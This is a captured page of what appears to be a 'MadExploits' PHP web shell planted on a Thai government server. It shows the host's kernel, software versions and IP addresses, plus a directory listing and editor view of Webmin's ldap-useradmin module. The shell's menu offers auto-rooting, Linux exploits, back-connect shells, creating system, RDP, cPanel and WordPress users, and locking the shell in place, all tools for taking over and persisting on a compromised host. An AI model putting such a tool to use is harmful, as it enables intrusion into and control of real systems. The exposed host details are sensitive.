Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
ldap-useradmin /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
5.96
KB
-rw-r--r--
acl_security.pl
7.55
KB
-rwxr-xr-x
batch_exec.cgi
15.71
KB
-rwxr-xr-x
batch_form.cgi
2.49
KB
-rwxr-xr-x
cgi_args.pl
501
B
-rwxr-xr-x
config
388
B
-rw-r--r--
config-ALL-linux
416
B
-rw-r--r--
config-coherent-linux
385
B
-rw-r--r--
config-debian-linux
406
B
-rw-r--r--
config-debian-linux-3.1
395
B
-rw-r--r--
config-debian-linux-4.0-ALL
388
B
-rw-r--r--
config-debian-squirrelmail-lin...
560
B
-rw-r--r--
config-macos
466
B
-rw-r--r--
config-mandrake-linux
385
B
-rw-r--r--
config-pardus-linux
397
B
-rw-r--r--
config-redhat-linux
385
B
-rw-r--r--
config-sol-linux
385
B
-rw-r--r--
config-suse-linux
394
B
-rw-r--r--
config-syno-linux
452
B
-rw-r--r--
config-trustix-linux
394
B
-rw-r--r--
config-united-linux
394
B
-rw-r--r--
config.info
5.45
KB
-rw-r--r--
config.info.ca
5.94
KB
-rw-r--r--
config.info.ca.UTF-8
6
KB
-rw-r--r--
config.info.de
6.81
KB
-rw-r--r--
config.info.de.UTF-8
6.81
KB
-rw-r--r--
config.info.es
5.28
KB
-rw-r--r--
config.info.es.UTF-8
5.28
KB
-rw-r--r--
config.info.fr
0
B
-rw-r--r--
config.info.nl
5.99
KB
-rw-r--r--
config.info.nl.UTF-8
5.99
KB
-rw-r--r--
config.info.no
5.84
KB
-rw-r--r--
config.info.no.UTF-8
5.84
KB
-rw-r--r--
config.info.pt_BR
6.76
KB
-rw-r--r--
config.info.pt_BR.UTF-8
6.76
KB
-rw-r--r--
cpan_modules.pl
85
B
-rwxr-xr-x
defaultacl
318
B
-rw-r--r--
edit_group.cgi
4.17
KB
-rwxr-xr-x
edit_user.cgi
14.32
KB
-rwxr-xr-x
index.cgi
7.52
KB
-rwxr-xr-x
install_check.pl
580
B
-rwxr-xr-x
ldap-useradmin-lib.pl
32.44
KB
-rwxr-xr-x
log_parser.pl
1.55
KB
-rwxr-xr-x
mass_delete_group.cgi
2.04
KB
-rwxr-xr-x
mass_delete_user.cgi
7.17
KB
-rwxr-xr-x
module.info
261
B
-rw-r--r--
module.info.ca
168
B
-rw-r--r--
module.info.ca.UTF-8
181
B
-rw-r--r--
module.info.cz
33
B
-rw-r--r--
module.info.cz.UTF-8
41
B
-rw-r--r--
module.info.de
178
B
-rw-r--r--
module.info.de.UTF-8
190
B
-rw-r--r--
module.info.es
31
B
-rw-r--r--
module.info.es.UTF-8
37
B
-rw-r--r--
module.info.ms_MY
178
B
-rw-r--r--
module.info.ms_MY.UTF-8
190
B
-rw-r--r--
module.info.nl
35
B
-rw-r--r--
module.info.nl.UTF-8
41
B
-rw-r--r--
module.info.no
32
B
-rw-r--r--
module.info.no.UTF-8
38
B
-rw-r--r--
module.info.pt_BR
42
B
-rw-r--r--
module.info.pt_BR.UTF-8
48
B
-rw-r--r--
postinstall.pl
224
B
-rwxr-xr-x
raw.cgi
967
B
-rwxr-xr-x
save_group.cgi
9.37
KB
-rwxr-xr-x
save_user.cgi
23.65
KB
-rwxr-xr-x
search_group.cgi
1.31
KB
-rwxr-xr-x
search_user.cgi
1.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : log_parser.pl
# log_parser.pl # Functions for parsing this module's logs do 'ldap-useradmin-lib.pl'; # parse_webmin_log(user, script, action, type, object, ¶ms) # Converts logged information from this module into human-readable form sub parse_webmin_log { local ($user, $script, $action, $type, $object, $p, $long) = @_; $object = &html_escape($object); if ($type eq 'user') { if ($action eq 'modify' && $p->{'old'} ne $object) { return &text('log_urename', "<tt>".&html_escape($p->{'old'})."</tt>", "<tt>$object</tt>"); } elsif ($action eq 'modify') { return &text('log_umodify', "<tt>$object</tt>"); } elsif ($action eq 'create') { return &text('log_ucreate', "<tt>$object</tt>"); } elsif ($action eq 'delete' && $p->{'delhome'}) { return &text('log_udeletehome', "<tt>$object</tt>", "<tt>".&html_escape($p->{'home'})."</tt>"); } elsif ($action eq 'delete') { return &text('log_udelete', "<tt>$object</tt>"); } } elsif ($type eq 'group') { if ($action eq 'modify') { return &text('log_gmodify', "<tt>$object</tt>"); } elsif ($action eq 'create') { return &text('log_gcreate', "<tt>$object</tt>"); } elsif ($action eq 'delete') { return &text('log_gdelete', "<tt>$object</tt>"); } } elsif ($action eq 'batch') { if ($object =~ /^\//) { return &text($long ? 'log_batch_l' : 'log_batch', "<tt>$object</tt>", $p->{'created'}, $p->{'modified'}, $p->{'deleted'}); } else { return &text($long ? 'log_ubatch_l' : 'log_ubatch', $p->{'created'}, $p->{'modified'},$p->{'deleted'}); } } return undef; }
Close